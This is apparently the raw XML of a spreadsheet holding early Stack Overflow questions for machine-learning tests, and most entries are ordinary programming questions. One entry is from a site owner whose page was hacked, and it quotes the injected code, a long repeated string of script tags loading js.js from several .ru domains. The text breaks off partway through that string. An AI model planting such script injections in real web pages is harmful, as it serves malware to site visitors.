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USER\PycharmProjects\MachineLearningModelTesting\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{916AE084-820C-4C2E-8148-D612B3669DB8}" xr6:coauthVersionLast="36" xr6:coauthVersionMax="36" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="23040" windowHeight="9060" xr2:uid="{00272EB3-0195-4852-AFB7-BC1EA14FBC42}"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet2" sheetId="2" r:id="rId1"/>
  </sheets>
  <definedNames>
    <definedName name="ExternalData_1" localSheetId="0" hidden="1">Sheet2!$A$1:$D$200001</definedName>
  </definedNames>
  <calcPr calcId="17902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3704D5-52C5-42B7-845A-59696356BF29}" keepAlive="1" name="Query - Questions" description="Connection to the 'Questions' query in the workbook." type="5" refreshedVersion="6" background="1" saveData="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=Questions;Extended Properties=&quot;&quot;" command="SELECT * FROM [Questions]"/>
  </connection>
</connections>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="20000" uniqueCount="20000">
  <si>
    <t>Id</t>
  </si>
  <si>
    <t>Score</t>
  </si>
  <si>
    <t>Title</t>
  </si>
  <si>
    <t>Body</t>
  </si>
  <si>
    <t>SQLStatement.execute() - multiple queries in one statement</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've written a database generation script in &lt;a href="http://en.wikipedia.org/wiki/SQL"&gt;SQL&lt;/a&gt; and want to execute it in my &lt;a href="http://en.wikipedia.org/wiki/Adobe_Integrated_Runtime"&gt;Adobe AIR&lt;/a&gt; application:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Create Table tRole (
      roleID integer Primary Key
      ,roleName varchar(40)
);
Create Table tFile (
    fileID integer Primary Key
    ,fileName varchar(50)
    ,fileDescription varchar(500)
    ,thumbnailID integer
    ,fileFormatID integer
    ,categoryID integer
    ,isFavorite boolean
    ,dateAdded date
    ,globalAccessCount integer
    ,lastAccessTime date
    ,downloadComplete boolean
    ,isNew boolean
    ,isSpotlight boolean
    ,duration varchar(30)
);
Create Table tCategory (
    categoryID integer Primary Key
    ,categoryName varchar(50)
    ,parent_categoryID integer
);
...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I execute this in Adobe AIR using the following methods:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static function RunSqlFromFile(fileName:String):void {
    var file:File = File.applicationDirectory.resolvePath(fileName);
    var stream:FileStream = new FileStream();
    stream.open(file, FileMode.READ)
    var strSql:String = stream.readUTFBytes(stream.bytesAvailable);
    NonQuery(strSql);
}
public static function NonQuery(strSQL:String):void
{
    var sqlConnection:SQLConnection = new SQLConnection();
    sqlConnection.open(File.applicationStorageDirectory.resolvePath(DBPATH);
    var sqlStatement:SQLStatement = new SQLStatement();
    sqlStatement.text = strSQL;
    sqlStatement.sqlConnection = sqlConnection;
    try
    {
        sqlStatement.execute();
    }
    catch (error:SQLError)
    {
        Alert.show(error.toString());
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;No errors are generated, however only &lt;code&gt;tRole&lt;/code&gt; exists. It seems that it only looks at the first query (up to the semicolon- if I remove it, the query fails). Is there a way to call multiple queries in one statement?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Good branching and merging tutorials for TortoiseSVN?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any really good tutorials explaining &lt;a href="http://svnbook.red-bean.com/en/1.8/svn.branchmerge.html" rel="nofollow"&gt;branching and merging&lt;/a&gt; with Apache Subversion? &lt;/p&gt;
&lt;p&gt;All the better if it's specific to TortoiseSVN client.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET Site Maps</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone got experience creating &lt;strong&gt;SQL-based ASP.NET&lt;/strong&gt; site-map providers?&lt;/p&gt;
&lt;p&gt;I've got the default XML file &lt;code&gt;web.sitemap&lt;/code&gt; working properly with my Menu and &lt;strong&gt;SiteMapPath&lt;/strong&gt; controls, but I'll need a way for the users of my site to create and modify pages dynamically.&lt;/p&gt;
&lt;p&gt;I need to tie page viewing permissions into the standard &lt;code&gt;ASP.NET&lt;/code&gt; membership system as well.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Function for creating color wheels</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is something I've pseudo-solved many times and never quite found a solution. That's stuck with me. The problem is to come up with a way to generate &lt;code&gt;N&lt;/code&gt; colors, that are as distinguishable as possible where &lt;code&gt;N&lt;/code&gt; is a parameter.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Adding scripting functionality to .NET applications</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a little game written in C#. It uses a database as back-end. It's 
a &lt;a href="http://en.wikipedia.org/wiki/Collectible_card_game"&gt;trading card game&lt;/a&gt;, and I wanted to implement the function of the cards as a script.&lt;/p&gt;
&lt;p&gt;What I mean is that I essentially have an interface, &lt;code&gt;ICard&lt;/code&gt;, which a card class implements (&lt;code&gt;public class Card056 : ICard&lt;/code&gt;) and which contains function that are called by the game.&lt;/p&gt;
&lt;p&gt;Now, to make the thing maintainable/moddable, I would like to have the class for each card as source code in the database and essentially compile it on first use. So when I have to add/change a card, I'll just add it to the database and tell my application to refresh, without needing any assembly deployment (especially since we would be talking about 1 assembly per card which means hundreds of assemblies).&lt;/p&gt;
&lt;p&gt;Is that possible? Register a class from a source file and then instantiate it, etc.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ICard Cards[current] = new MyGame.CardLibrary.Card056();
Cards[current].OnEnterPlay(ref currentGameState);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The language is C#, but extra bonus if it's possible to write the script in any .NET language.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I use nested classes in this case?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a collection of classes used for video playback and recording. I have one main class which acts like the public interface, with methods like &lt;code&gt;play()&lt;/code&gt;, &lt;code&gt;stop()&lt;/code&gt;, &lt;code&gt;pause()&lt;/code&gt;, &lt;code&gt;record()&lt;/code&gt; etc... Then I have workhorse classes which do the video decoding and video encoding. &lt;/p&gt;
&lt;p&gt;I just learned about the existence of nested classes in C++, and I'm curious to know what programmers think about using them. I am a little wary and not really sure what the benefits/drawbacks are, but they seem (according to the book I'm reading) to be used in cases such as mine.&lt;/p&gt;
&lt;p&gt;The book suggests that in a scenario like mine, a good solution would be to nest the workhorse classes inside the interface class, so there are no separate files for classes the client is not meant to use, and to avoid any possible naming conflicts? I don't know about these justifications. Nested classes are a new concept to me. Just want to see what programmers think about the issue.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Homegrown consumption of web services</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been writing a few web services for a .net app, now I'm ready to consume them. I've seen numerous examples where there is homegrown code for consuming the service as opposed to using the auto generated methods Visual Studio creates when adding the web reference. &lt;/p&gt;
&lt;p&gt;Is there some advantage to this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Deploying SQL Server Databases from Test to Live</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wonder how you guys manage deployment of a database between 2 SQL Servers, specifically SQL Server 2005.
Now, there is a development and a live one. As this should be part of a buildscript (standard windows batch, even do with current complexity of those scripts, i might switch to PowerShell or so later), Enterprise Manager/Management Studio Express do not count.&lt;/p&gt;
&lt;p&gt;Would you just copy the .mdf File and attach it? I am always a bit careful when working with binary data, as this seems to be a compatiblity issue (even though development and live should run the same version of the server at all time).&lt;/p&gt;
&lt;p&gt;Or - given the lack of "EXPLAIN CREATE TABLE" in T-SQL - do you do something that exports an existing database into SQL-Scripts which you can run on the target server? If yes, is there a tool that can automatically dump a given Database into SQL Queries and that runs off the command line? (Again, Enterprise Manager/Management Studio Express do not count).&lt;/p&gt;
&lt;p&gt;And lastly - given the fact that the live database already contains data, the deployment may not involve creating all tables but rather checking the difference in structure and ALTER TABLE the live ones instead, which may also need data verification/conversion when existing fields change.&lt;/p&gt;
&lt;p&gt;Now, i hear a lot of great stuff about the &lt;a href="http://www.red-gate.com/products/index.htm"&gt;Red Gate&lt;/a&gt; products, but for hobby projects, the price is a bit steep.&lt;/p&gt;
&lt;p&gt;So, what are you using to automatically deploy SQL Server Databases from Test to Live?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Automatically update version number</t>
  </si>
  <si>
    <t>&lt;p&gt;I would like the version property of my application to be incremented for each build but I'm not sure on how to enable this functionality in Visual Studio (2005/2008). I have tried to specify the AssemblyVersion as 1.0.* but it doesn't get me exactly what I want. &lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;I'm also using a settings file and in earlier attempts when the assembly version changed my settings got reset to the default since the application looked for the settings file in another directory. &lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;I would like to be able to display a version number in the form of 1.1.38 so when a user finds a problem I can log the version they are using as well as tell them to upgrade if they have an old release.&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;A short explanation of how the versioning works would also be appreciated. When does the build and revision number get incremented?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Visual Studio Setup Project - Per User Registry Settings</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to maintain a Setup Project in &lt;code&gt;Visual Studio 2003&lt;/code&gt; (yes, it's a legacy application). The problem we have at the moment is that we need to write registry entries to &lt;code&gt;HKCU&lt;/code&gt; for every user on the computer. They need to be in the &lt;code&gt;HKCU&lt;/code&gt; rather than &lt;code&gt;HKLM&lt;/code&gt; because they are the default user settings, and they do change per user. My feeling is that&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;This isn't possible&lt;/li&gt;
&lt;li&gt;This isn't something the installer should be doing, but something the application should be doing (after all what happens when a user profile is created after the install?).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;With that in mind, I still want to change as little as possible in the application, so my question is, &lt;strong&gt;is it possible to add registry entries for every user in a &lt;code&gt;Visual Studio 2003&lt;/code&gt; setup project?&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;And, at the moment the project lists five registry root keys (&lt;code&gt;HKEY_CLASSES_ROOT, HKEY_CURRENT_USER&lt;/code&gt;, &lt;code&gt;HKEY_LOCAL_MACHINE&lt;/code&gt;, &lt;code&gt;HKEY_USERS&lt;/code&gt;, and User/Machine Hive). I don't really know anything about the Users root key, and haven't seen User/Machine Hive. Can anyone enlighten me on what they are? Perhaps they could solve my problem above.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I connect to a database and loop over a recordset in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the simplest way to connect and query a database for a set of records in C#?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get the value of built, encoded ViewState?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to grab the base64-encoded representation of the ViewState. Obviously this would not be available until fairly late in the request lifecycle, which is OK.&lt;/p&gt;
&lt;p&gt;For example, if the output of the page includes:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;input type="hidden" name="__VIEWSTATE" 
  id="__VIEWSTATE" value="/wEPDwUJODU0Njc5MD...==" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I need a way on the server side to get the value &lt;code&gt;"/wEPDwUJODU0Njc5MD...=="&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;To clarify, I need this value when the page is being rendered, not on PostBack. e.g. I need to know the ViewState value that is being &lt;em&gt;sent&lt;/em&gt; to the client, not the ViewState I'm getting back from them.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I delete a file which is locked by another process in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a way to delete a file which is locked by another process using C#. I suspect the method must be able to find which process is locking the file (perhaps by tracking the handles, although I'm not sure how to do this in C#) then close that process before being able to complete the file delete using &lt;code&gt;File.Delete()&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Process size on UNIX</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the correct way to get the process size on &lt;code&gt;Solaris, HP-UX&lt;/code&gt; and &lt;code&gt;AIX&lt;/code&gt;? Should we use &lt;code&gt;top&lt;/code&gt; or &lt;code&gt;ps -o vsz&lt;/code&gt; or something else?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Use SVN Revision to label build in CCNET</t>
  </si>
  <si>
    <t>&lt;p&gt;I am using CCNET on a sample project with SVN as my source control. CCNET is configured to create a build on every check in. CCNET uses MSBuild to build the source code.&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;I would like to use the latest revision number to generate AssemblyInfo.cs while compiling._x000D_
How can I retrieve the latest revision from subversion and use the value in CCNET?&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;Edit: I'm not using NAnt - only MSBuild.&lt;/p&gt;</t>
  </si>
  <si>
    <t>How to make subdomain user accounts in a webapp</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking to allow users to control of subdomain of an app I am toying with, much like Basecamp where it is &lt;code&gt;customusername.seework.com&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;What is required on the &lt;code&gt;DNS&lt;/code&gt; end to allow these to be created dynamically and be available instantly. &lt;/p&gt;
&lt;p&gt;And how do you recommend dealing with this in the logic of the site? &lt;code&gt;Htaccess&lt;/code&gt; rule to  lookup the subdomain in the &lt;code&gt;DB&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is nAnt still supported and suitable for .net 3.5/VS2008?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am using MSBuild to build my stuff. I want to use CruiseControl.net as by Build Server.&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;Now, CCNET refers nAnt a lot, but it looks as if ccnet can do most of the stuff nant could do through the project configuration and msbuild. Also, nAnt seems a bit unsupported, with a Beta release that is almost a year old now.&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;In short: I am actually quite happy with MSBuild (especially since it's the "official" compiler front end) and a bit uncomfortable with nAnt, but I do not want to judge prematurely.&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;What would be reasons to use nAnt over MSBuild? Especially with ccnet, which seems to overlap a bit with nant in terms of features (and adding the automated build related stuff)&lt;/p&gt;</t>
  </si>
  <si>
    <t>Is Windows Server 2008 "Server Core" appropriate for a SQL Server instance?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm setting up a dedicated SQL Server 2005 box on Windows Server 2008 this week, and would like to pare it down to be as barebones as possible while still being fully functional.&lt;/p&gt;
&lt;p&gt;To that end, the "Server Core" option sounds appealing, but I'm not clear about whether or not I can run SQL Server on that SKU.  Several services are addressed on the &lt;a href="http://www.microsoft.com/windowsserver2008/en/us/compare-core-installation.aspx"&gt;Microsoft website&lt;/a&gt;, but I don't see any indication about SQL Server.&lt;/p&gt;
&lt;p&gt;Does anyone know definitively?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to copy a database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I always create a new empty database, after that backup and restore of the existing database into it, but is this really the best way? As it seems very error prone and over complicated for me.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I logically reorder columns in a table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I'm adding a column to a table in Microsoft SQL Server, can I control where the column is displayed logically in queries?&lt;/p&gt;
&lt;p&gt;I don't want to mess with the physical layout of columns on disk, but I would like to logically group columns together when possible so that tools like SQL Server Management Studio list the contents of the table in a convenient way.&lt;/p&gt;
&lt;p&gt;I know that I can do this through SQL Management Studio by going into their "design" mode for tables and dragging the order of columns around, but I'd like to be able to do it in raw SQL so that I can perform the ordering scripted from the command line.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET Unit Testing packages?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Getting back into a bit more .NET after a few-years of not using it full-time, and wondering what the good unit testing packages are these days.&lt;/p&gt;
&lt;p&gt;I'm familiar with NUnit (a few years ago), and have played briefly around with IronRuby, with the goal of getting something like rspec going, but don't know much beyond that.&lt;/p&gt;
&lt;p&gt;I realize I could google for this and call it a day but I believe I'm likely to get a better and more informed response from asking a question here :-)&lt;/p&gt;
&lt;p&gt;Suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Federated (Synced) Subversion servers?</t>
  </si>
  <si>
    <t>&lt;p&gt;Is it possible to create "federated" Subversion servers?_x000D_
As in one server at location A and another at location B that sync up their local versions of the repository automatically.  That way when someone at either location interacts with the repository they are accessing their respective local server and therefore has faster response times.&lt;/p&gt;</t>
  </si>
  <si>
    <t>What language do you use for PostgreSQL triggers and stored procedures?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;PostgreSQL is interesting in that it supports several languages for writing stored procedures.  Which one do you use, and why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Convert HashBytes to VarChar</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to get the MD5 Hash of a string value in SQL Server 2005. I do this with the following command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT HashBytes('MD5', 'HelloWorld')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, this returns a VarBinary instead of a VarChar value. If I attempt to convert &lt;code&gt;0x68E109F0F40CA72A15E05CC22786F8E6&lt;/code&gt; into a VarChar I get &lt;code&gt;hÃ¡ Ã°Ã´Â§*Ã \Ã‚'â€ Ã¸Ã¦&lt;/code&gt; instead of &lt;code&gt;68E109F0F40CA72A15E05CC22786F8E6&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Is there any SQL-based solution?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href="http://stackoverflow.com/questions/2120/#2382"&gt;Yes&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Datatable vs Dataset</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I currently use a DataTable to get results from a database which I can use in my code.&lt;/p&gt;
&lt;p&gt;However, many example on the web show using a DataSet instead and accessing the table(s) through the collections method.&lt;/p&gt;
&lt;p&gt;Is there any advantage, performance wise or otherwise, of using DataSets or DataTables as a storage method for SQL results?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I traverse a collection in classic ASP?</t>
  </si>
  <si>
    <t>&lt;P&gt;I want to be able to do:&lt;/P&gt;&lt;PRE&gt;&lt;CODE&gt;For Each thing In things_x000D_
End For_x000D_
&lt;/CODE&gt;&lt;/PRE&gt;_x000D_
&lt;P&gt;CLASSIC ASP - NOT .NET!&lt;/P&gt;</t>
  </si>
  <si>
    <t>How do you disable browser Autocomplete on web form field / input tag?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you disable &lt;code&gt;autocomplete&lt;/code&gt; in the major browsers for a specific &lt;code&gt;input&lt;/code&gt; (or &lt;code&gt;form field&lt;/code&gt;)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Good STL-like library for C</t>
  </si>
  <si>
    <t>&lt;p&gt;What are good libraries for C with datastructures like vectors, deques, stacks, hashmaps, treemaps, sets, etc.? Plain C, please, and platform-independent.&lt;/p&gt;</t>
  </si>
  <si>
    <t>What are effective options for embedding video in an ASP.NET web site?</t>
  </si>
  <si>
    <t>&lt;p&gt;A quick glance at the present-day internet would seem to indicate that Adobe Flash is the obvious choice for embedding video in a web page.  Is this accurate, or are they other effective choices?  Does the choice of ASP.NET as a platform influence this decision?&lt;/p&gt;</t>
  </si>
  <si>
    <t>What are your favorite Powershell Cmdlets?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I just found /n softwares free Powershell NetCmdlets, and after playing with them I love the functionality they bring to the command line.  So it raises the question what are your favorite Cmdlets, and how do you use them?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Data verifications in Getter/Setter or elsewhere?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm wondering if it's a good idea to make &lt;strong&gt;verifications&lt;/strong&gt; in &lt;strong&gt;getters&lt;/strong&gt; and &lt;strong&gt;setters&lt;/strong&gt;, or elsewhere in the code.&lt;/p&gt;
&lt;p&gt;This might surprise you be when it comes to &lt;strong&gt;optimizations&lt;/strong&gt; and &lt;strong&gt;speeding&lt;/strong&gt; up the code, I think you should not make verifications in getters and setters, but in the code where you're &lt;strong&gt;updating&lt;/strong&gt; your files or database. Am I wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Global Exception Handling for winforms control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When working on ASP.NET 1.1 projects I always used the Global.asax to catch all errors. I'm looking for a similar way to catch all exceptions in a Windows Forms user control, which ends up being a hosted IE control. What is the proper way to go about doing something like this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Converting ARBG to RGB with alpha blending</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say that we have an ARGB color:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Color argb = Color.FromARGB(127, 69, 12, 255); //Light Urple.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When this is painted on top of an existing color, the colors will blend. So when it is blended with white, the resulting color is &lt;code&gt;Color.FromARGB(255, 162, 133, 255);&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The solution should work like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Color blend = Color.White; 
Color argb = Color.FromARGB(127, 69, 12, 255); //Light Urple.      
Color rgb = ToRGB(argb, blend); //Same as Color.FromARGB(255, 162, 133, 255);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is &lt;code&gt;ToRGB&lt;/code&gt;'s implementation?      &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Paging SQL Server 2005 Results</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I page results in SQL Server 2005?&lt;/p&gt;
&lt;p&gt;I tried it in SQL Server 2000, but there was no reliable way to do this. I'm now wondering if SQL Server 2005 has any built in method?&lt;/p&gt;
&lt;p&gt;What I mean by paging is, for example, if I list users by their username, I want to be able to only return the first 10 records, then the next 10 records and so on.&lt;/p&gt;
&lt;p&gt;Any help would be much appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL/Apache Error in PHP MySQL query</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am getting the following error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Access denied for user 'apache'@'localhost' (using password: NO)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;When using the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
include("../includes/connect.php");
$query = "SELECT * from story";
$result = mysql_query($query) or die(mysql_error());
echo "&amp;lt;h1&amp;gt;Delete Story&amp;lt;/h1&amp;gt;";
if (mysql_num_rows($result) &amp;gt; 0) {
    while($row = mysql_fetch_row($result)){
          echo '&amp;lt;b&amp;gt;'.$row[1].'&amp;lt;/b&amp;gt;&amp;lt;span align="right"&amp;gt;&amp;lt;a href="../process/delete_story.php?id='.$row[0].'"&amp;gt;Delete&amp;lt;/a&amp;gt;&amp;lt;/span&amp;gt;';
      echo '&amp;lt;br /&amp;gt;&amp;lt;i&amp;gt;'.$row[2].'&amp;lt;/i&amp;gt;';
    }
}
else {
   echo "No stories available.";
}
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The connect.php file contains my MySQL connect calls that are working fine with my INSERT queries in another portion of the software.  If I comment out the $result = mysql_query line, then it goes through to the else statement.  So, it is that line or the content in the if.&lt;/p&gt;
&lt;p&gt;I have been searching the net for any solutions, and most seem to be related to too many MySQL connections or that the user I am logging into MySQL as does not have permission.  I have checked both.  I can still perform my other queries elsewhere in the software, and I have verified that the account has the correct permissions.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>My website got hacked... What should I do?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My dad called me today and said people going to his website were getting 168 viruses trying to download to their computers. He isn't technical at all, and built the whole thing with a WYSIWYG editor.&lt;/p&gt;
&lt;p&gt;I popped his site open and viewed the source, and there was a line of Javascript includes at the bottom of the source right before the closing HTML tag. They included this file (among many others): &lt;a href="http://www.98hs.ru/js.js" rel="nofollow"&gt;http://www.98hs.ru/js.js&lt;/a&gt; &amp;lt;-- TURN OFF JAVASCRIPT BEFORE YOU GO TO THAT URL.&lt;/p&gt;
&lt;p&gt;So I commented it out for now. It turns out his ftp password was a plain dictionary word six letters long, so we think that's how it got hacked. We've changed his password to an 8+ digit non-word string (he wouldn't go for a passphrase since he is a hunt-n-peck typer).&lt;/p&gt;
&lt;p&gt;I did a &lt;a href="http://whois.domaintools.com/98hs.ru" rel="nofollow"&gt;whois on 98hs.ru&lt;/a&gt; and found it is hosted from a server in Chile. There is actually an e-mail address associated with it too, but I seriously doubt this person is the culprit. Probably just some other site that got hacked...&lt;/p&gt;
&lt;p&gt;I have no idea what to do at this point though as I've never dealt with this sort of thing before. Anyone have any suggestions?&lt;/p&gt;
&lt;p&gt;He was using plain jane un-secured ftp through webhost4life.com. I don't even see a way to &lt;em&gt;do&lt;/em&gt; sftp on their site. I'm thinking his username and password got intercepted?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;So, to make this more relevant to the community, what are the steps you should take/best practices you should follow to protect your website from getting hacked?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;For the record, here is the line of code that "magically" got added to his file (and isn't in his file on his computer -- I've left it commented out just to make absolute sure it won't do anything on this page, although I'm sure Jeff would guard against this):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!--script src=http://www.98hs.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.98hs.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.98hs.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.98hs.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.98hs.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.98hs.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.porv.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.98hs.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.porv.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.98hs.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.porv.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.98hs.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.porv.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.98hs.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.98hs.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.porv.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.porv.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porv.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.porv.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.porv.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.porv.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.porv.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.porv.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.porv.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script 